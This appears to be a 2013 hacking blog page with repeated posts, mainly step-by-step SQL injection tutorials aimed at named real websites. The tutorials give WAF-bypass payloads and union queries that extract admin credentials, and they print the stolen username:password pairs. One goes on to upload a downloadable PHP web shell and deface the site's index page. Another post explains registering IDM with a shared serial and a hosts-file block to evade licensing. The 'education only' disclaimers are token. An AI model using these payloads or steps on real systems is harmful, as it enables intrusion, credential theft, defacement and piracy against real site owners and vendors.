Monday, 20 May 2013
Labels:
Tutorials
Hi friends,
hopes you all are fine well,I have seen many peoples face 404 forbidden difficulties when they try to inject a website which have some good WAF's through sql injection so I was thinking to share a tutorial with you peoples which is written by my friend :P P4K M4D HUNT3R-Z St!k3r this tutorial is based on that how you can remember the word "can" bypass or get an idea that how to bypass waf 404 forbidden in sql injection well this tutorial is noob friendly and hopes you have some basic knowledge about SQL injection attack method if not then read it first CLICK HERE.
so let's start..
we have our target which has waf so we will try to bypass it and get the admin username and pass :D
http://www.gogame.co.in/news.php?id=189
so now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.gogame.co.in/news.php?id=189'
nothing change ?
try to add before number
http://www.gogame.co.in/news.php?id=%27189
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.gogame.co.in/news.php?id=189'
by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
now you can see this msg on page !
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/news.php?id=189'
this section again ! now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
the page remain same ?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
same ?
continue this untill the error display on page !
http://www.gogame.co.in/news.php?id=189' order by 4--+-
same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale column now !
write
http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !
http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P
now u can see 2 3 4 at the page as vuln columns !
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-
and after 6 add "from Information_schema.tables"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
bypassed
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
ops again 403
table_name is forbidden
bypass
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
the page show the result
usnd pdgame
this mean these are the columns of table adminlogin
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
the page show this result
kolgo:gamekol
mean
1st user is
username=kolgo
password=gamekol
now we have the password we will move to admin panel to hack website
Read More
How to bypass WAF ( Web Application Firewall ) in SQL injection.
hopes you all are fine well,I have seen many peoples face 404 forbidden difficulties when they try to inject a website which have some good WAF's through sql injection so I was thinking to share a tutorial with you peoples which is written by my friend :P P4K M4D HUNT3R-Z St!k3r this tutorial is based on that how you can remember the word "can" bypass or get an idea that how to bypass waf 404 forbidden in sql injection well this tutorial is noob friendly and hopes you have some basic knowledge about SQL injection attack method if not then read it first CLICK HERE.
so let's start..
we have our target which has waf so we will try to bypass it and get the admin username and pass :D
http://www.gogame.co.in/news.php?id=189
so now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.gogame.co.in/news.php?id=189'
nothing change ?
try to add before number
http://www.gogame.co.in/news.php?id=%27189
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.gogame.co.in/news.php?id=189'
by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
now you can see this msg on page !
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/news.php?id=189'
this section again ! now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
the page remain same ?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
same ?
continue this untill the error display on page !
http://www.gogame.co.in/news.php?id=189' order by 4--+-
same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale column now !
write
http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !
http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P
now u can see 2 3 4 at the page as vuln columns !
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-
and after 6 add "from Information_schema.tables"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
bypassed
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
ops again 403
table_name is forbidden
bypass
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
the page show the result
usnd pdgame
this mean these are the columns of table adminlogin
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
the page show this result
kolgo:gamekol
mean
1st user is
username=kolgo
password=gamekol
now we have the password we will move to admin panel to hack website
IMPORTANT NOTE :
well this tutorial is only for education purpose we are not responsible on that how you use this.....be aware
don't forget to comment ;)
Thursday, 9 May 2013
Labels:
Tricks
Hello friends hopes you all are fine :D
today i was thinking to share a trick with you people's which is written by my friend madCodE in this trick we are going to register IDM which is one of the best download manager out there :D
to full version without using a crack or patch !! interesting naah :D
So let's start
1) first of all… if you have any antivirus, deactivate it because we are going to edit c:/windows/system32/drivers/etc/hosts file
2) right click on it and select security tab
now press edit button and in users option .. select full control option and save it
3) now double click on hosts file , it will ask how to open file? use notepad to open it
4) now paste these links in hosts file and save it
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
5) now open idm > registration >
first name = Haxor
last name = Kakka
email = haxor.py@facebook.com
serial = GZLJY-X50S3-0S20D-NFRF9
And hit enter :D voila you have registered the IDM without any patch or crack :D
enjoy ;)
Read More
Registering IDM without any patch or crack.
Hello friends hopes you all are fine :D
today i was thinking to share a trick with you people's which is written by my friend madCodE in this trick we are going to register IDM which is one of the best download manager out there :D
to full version without using a crack or patch !! interesting naah :D
So let's start
1) first of all… if you have any antivirus, deactivate it because we are going to edit c:/windows/system32/drivers/etc/hosts file
2) right click on it and select security tab
now press edit button and in users option .. select full control option and save it
3) now double click on hosts file , it will ask how to open file? use notepad to open it
4) now paste these links in hosts file and save it
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
5) now open idm > registration >
first name = Haxor
last name = Kakka
email = haxor.py@facebook.com
serial = GZLJY-X50S3-0S20D-NFRF9
And hit enter :D voila you have registered the IDM without any patch or crack :D
enjoy ;)
Labels:
Tutorials
A tutorial By one of my best friend this tutorial will guide you that how you can use sqli vulnerability to hack a target :D noob friendly tut :D
Like Str!k3r official team Page.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com
type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=
now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.area96.it/news.php?nws=61'
nothing change ?
try to add before number
http://www.area96.it/news.php?nws=%2761
still nothing happened ?
http://www.area96.it/news.php?nws"61
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.area96.it/news.php?nws=61'
by adding this ' the result of page changed !
now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !
we got the column we will find the vulnerbale column now !
write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
now
2
1
6
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
now enter
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
these are tables
now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !
now we will send the query to open login table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
the page show the result
id_login,username,password,email,admin,abilitato,id_friends
this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
the page show this result
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa
logged in successfully !
now you have access to change website products news etc ......
but to take fully control we need to upload shell in the webstie !
shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !
there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !
you can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
now find any area from where u can upload this shell like
add image add product etc
i have an option here for add news !
and it give me option of adding image of news !
i will try to upload madspotshell.php from image upload section !
just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !
now just find the shell location!
normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is
http://www.area96.it/images/news/1352954638mad.php
hit enter !
shell opened !
now you can remove add edit anyfile from here !
-------------------------------------------------------------------------------------------------
last step :
now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/
at the low top
u can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which is showing ure current directory
u need to edit index.php which is located at area96.it
so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line
it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !
now at the center u can see the files located in the folder !
also index.php
just rename ure deface page to index.php and upload it here !
it will over write the file and when someone open the site it will show your deface page at the site instead the site !
upload button is at the botton of the shell !
just replace ure index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
now open the website and see ure name is there or not !
http://www.area96.it/
Hacked BY Str!k3r !
----------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
-----------------------------------------------------------------------------------------------
Read More
Sqli Hacking + Noob Friendly Tutorial
A tutorial By one of my best friend this tutorial will guide you that how you can use sqli vulnerability to hack a target :D noob friendly tut :D
Like Str!k3r official team Page.
So let's start,
1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com
type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=
now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.area96.it/news.php?nws=61'
nothing change ?
try to add before number
http://www.area96.it/news.php?nws=%2761
still nothing happened ?
http://www.area96.it/news.php?nws"61
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.area96.it/news.php?nws=61'
by adding this ' the result of page changed !
now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !
we got the column we will find the vulnerbale column now !
write
http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-
now
2
1
6
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-
and after 6 add "from Information_schema.tables"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
now enter
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-
now on the page !
it showing the database's tables !
accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,
these are tables
now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !
now we will send the query to open login table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
for this you can use this site !
http://www.branah.com/ascii-converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-
the page show the result
id_login,username,password,email,admin,abilitato,id_friends
this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--
the page show this result
davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0
mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion
etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa
logged in successfully !
now you have access to change website products news etc ......
but to take fully control we need to upload shell in the webstie !
shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !
there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !
you can download it from here
http://www.mediafire.com/?8b6dmgdo7edkus2
now find any area from where u can upload this shell like
add image add product etc
i have an option here for add news !
and it give me option of adding image of news !
i will try to upload madspotshell.php from image upload section !
just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !
now just find the shell location!
normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is
http://www.area96.it/images/news/1352954638mad.php
hit enter !
shell opened !
now you can remove add edit anyfile from here !
-------------------------------------------------------------------------------------------------
last step :
now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/
at the low top
u can see this
PWD: /home/area96/area96.it/images/news/ |CURRENT|
which is showing ure current directory
u need to edit index.php which is located at area96.it
so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line
it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !
now at the center u can see the files located in the folder !
also index.php
just rename ure deface page to index.php and upload it here !
it will over write the file and when someone open the site it will show your deface page at the site instead the site !
upload button is at the botton of the shell !
just replace ure index.php to /home/area96/area96.it/ |CURRENT
and the site is hacked!
now open the website and see ure name is there or not !
http://www.area96.it/
Hacked BY Str!k3r !
----------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
-----------------------------------------------------------------------------------------------
Labels:
Miscellaneous
Read More
Installing Google Chromium Browser In Backtrack 5
Well friends,
Today we will see that how to install Google Chromium Browser in Backtrack 5,
So as we know that Google Chrome is one of the best browser ever made,Google also made a chrome like flavour for linux OS which called Chromium Browser
it has many features and most safe browser ever,
well Chrome can be installed on Windows without any problem :D but the situation get worse when a hacker or a pentester or a linux distros lover's tries to install it on Backtrack or other distros.
So let's start step by step that how to install Chromium on a distro which is in my case Backtrack 5 R3
So let's do it ;)
1) first of all open terminal and download Google Chromium archive by this command.
root@bt:~# apt-get install chromium-browser
2) After completion of download you can see Chromium on Application=>Internet=>Chromium Web Browser so let's open it ^_^
Well that's the main problem we actually get :D so how to solve this it's easy
open terminal and type
root@bt:~# cd /usr/lib/chromium-browser
3) Now type
root@bt:/usr/lib/chromium-browser# hexedit chromium-browser
something like this will be popup on the terminal
Don't worry now we just need to change the value of a specific id. :D
4) Now the most important step Press the tab button and then ctrl+s to be in the search mode then type "geteuid" and replace it with "getppid" and don't hit enter -_- press ctrl+x and it will prompt you to save changes or not just press "Y"
Voila now open the Chromium and check if it's opening or not :D
Enjoy your Chrome browser on Backtrack :D
Don't forget to comment or giving us your feedback if you have any problem regarding the tut just drop a comment below.
Thank you.
Today we will see that how to install Google Chromium Browser in Backtrack 5,
So as we know that Google Chrome is one of the best browser ever made,Google also made a chrome like flavour for linux OS which called Chromium Browser
it has many features and most safe browser ever,
well Chrome can be installed on Windows without any problem :D but the situation get worse when a hacker or a pentester or a linux distros lover's tries to install it on Backtrack or other distros.
So let's start step by step that how to install Chromium on a distro which is in my case Backtrack 5 R3
So let's do it ;)
1) first of all open terminal and download Google Chromium archive by this command.
root@bt:~# apt-get install chromium-browser
2) After completion of download you can see Chromium on Application=>Internet=>Chromium Web Browser so let's open it ^_^
Well that's the main problem we actually get :D so how to solve this it's easy
open terminal and type
root@bt:~# cd /usr/lib/chromium-browser
3) Now type
